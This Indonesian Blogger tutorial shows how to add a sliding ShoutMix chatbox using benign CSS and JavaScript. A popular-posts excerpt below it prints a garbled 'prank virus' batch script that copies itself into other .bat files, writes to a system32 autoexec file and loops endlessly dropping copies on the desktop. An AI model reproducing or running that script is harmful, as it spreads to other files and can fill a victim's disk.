Langsung ke konten utama

Membuat Slideshow Chatbox

kali ini saya ingin share sedikit tentang membuat chatbox seperti yang saya gunakan sekarang ini. udah ah malas basa sasi.. langsung aja..begini CERITANYA....

1. Pertama-tama Log In terlebih dahulu ke Account Blogger Anda.
2. Setelah itu klik Tata Letak > Elemen Halaman > Tambah Gadget > HTML/Java Script.
3. Kemudian masukkan kode di bawah ini.

<style type="text/css">
#gb{
position:fixed;
top:50px;
z-index:+1000;
}


* html #gb{position:relative;}

.gbtab{
height:100px;
width:30px;
float:left;
cursor:pointer;
background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg90t9QzBs4cYIzYCIiih01baJjvMfmjsXQNglP6yyHJJ52CkRkaLmvAFDNlIlWrGf_97VNs8GEUTrvn8za6TokrTMKQfYnQH32UXswB5C9wPic7_WcvhgCAtEnqFlq8cVeC6liLXg3wbCI/') no-repeat;
}
.gbcontent{
float:left;
border:2px solid #A5BD51;
background:#F5F5F5;
padding:10px;
}
</style>

<script type="text/javascript">
function showHideGB(){
var gb = document.getElementById("gb");
var w = gb.offsetWidth;
gb.opened ? moveGB(0, 30-w) : moveGB(20-w, 0);
gb.opened = !gb.opened;
}
function moveGB(x0, xf){
var gb = document.getElementById("gb");
var dx = Math.abs(x0-xf) > 10 ? 5 : 1;
var dir = xf>x0 ? 1 : -1;
var x = x0 + dx * dir;
gb.style.right = x.toString() + "px";
if(x0!=xf){setTimeout("moveGB("+x+", "+xf+")", 10);}
}
</script>

<div id="gb">

<div class="gbtab" onclick="showHideGB()"> </div>

<div class="gbcontent">

<!-- Begin ShoutMix - -->
<iframe scrolling="auto" frameborder="0" width="160" src="http://www5.shoutmix.com/?fbycom" height="400" title="fbycom">
<a href="http://www5.shoutmix.com/?fbycom">View shoutbox</a>
</iframe>
<br/>
<!-- End ShoutMix -->


<script type="text/javascript">
var gb = document.getElementById("gb");
gb.style.right = (30-gb.offsetWidth).toString() + "px";
</script></div></div>

4. Untuk kode yang berwana Hijau, Anda bisa menggantinya dengan kode Shoumix Anda.
5. Lalu simpan dan lihat hasilnya.

Komentar

aan bahrul anwar mengatakan…
assalam,,,
salam silaturrahmi, smoga anda tambah sukses.
saya kan coba yah,,???
saya jg masih belajar (alias gaptek)
terima kasih,,,
wsslm....

Postingan populer dari blog ini

how to make a prank virus only for fun!

hello friends........ in this post i will tell you how can u make a funny prank virus :) trick is here: open notepad and type @echo off 3echo checking system:4 5echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT6echo VIRUS DETECTED pause echo DELETING VIRUS pause :1 dir /s copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat7 goto 1 This will create a never ending stream of mindless code. This cannot be stopped easily.8Save the file as "virus.bat"

trik memperindah blog dengan berbagai aksesoris

Konon, blog itu berjenis kelamin perempuan. Dan, karena itu, perlu dihiasi dg aksesoris supaya selalu tampak cantik dan dapat menarik hati kaum blogger (yg ini berjenis laki-laki).Berikut sejumlah “perhiasan” blog yg dapat dipasang di blog Anda yg berfungsi tidak hanya sebagai perhiasan tapi juga untuk menarik hati kaum blogger (baca, pengunjung) dan search engine. Sekali lagi perlu diingat, aksesoris ini hanya dapat dipasang pada blog yg templatenya dapat diedit seperti blogspot.com, blogdrive.com plus blog yg domain/hostingnya beli sendiri, tentunya.1. BukutamuBukutamu blog disebut juga dg shoutbox atau tagboard. Sama dg bukutamu website, tapi bentuknya lebih sederhana. Banyak situs penyedia bukutamu blog gratis yg bisa Anda cari di google dg kata kunci shoutbox atau tagboard. http://shoutmix.com termasuk penyedia bukutamu blog yg disukai yg servernya cukup stabil.Caranya:

Global Warming's Effects Stretch from the Extremes of the World to Human Cultures

The Most Important Things You Can Do about Rapid Climate Change: 1. Understand the Problem 2. Do Something Today to Reduce Greenhouse Gas Emissions This Web site will help you learn the connection between human-made Carbon Dioxide and rapid climate changes and negative effects around the world. The hard fact is that despite what many nations, companies, cities and people are starting to do to reduce their global warming emissions, the world is putting more CO 2 into the air than ever before. The current amount is 385 parts per million (ppm) -- higher than ever in the past 800,000 years. At the same time, renowned American climatologist Dr. James Hansen of NASA says we already have too much CO 2 and other greenhouse gases in the air: "If humanity wishes to preserve a planet similar to that on which civilization developed and to which life on Earth is adapted ... CO 2 will need to be reduced from its current 385 ppm to at most 350 ppm."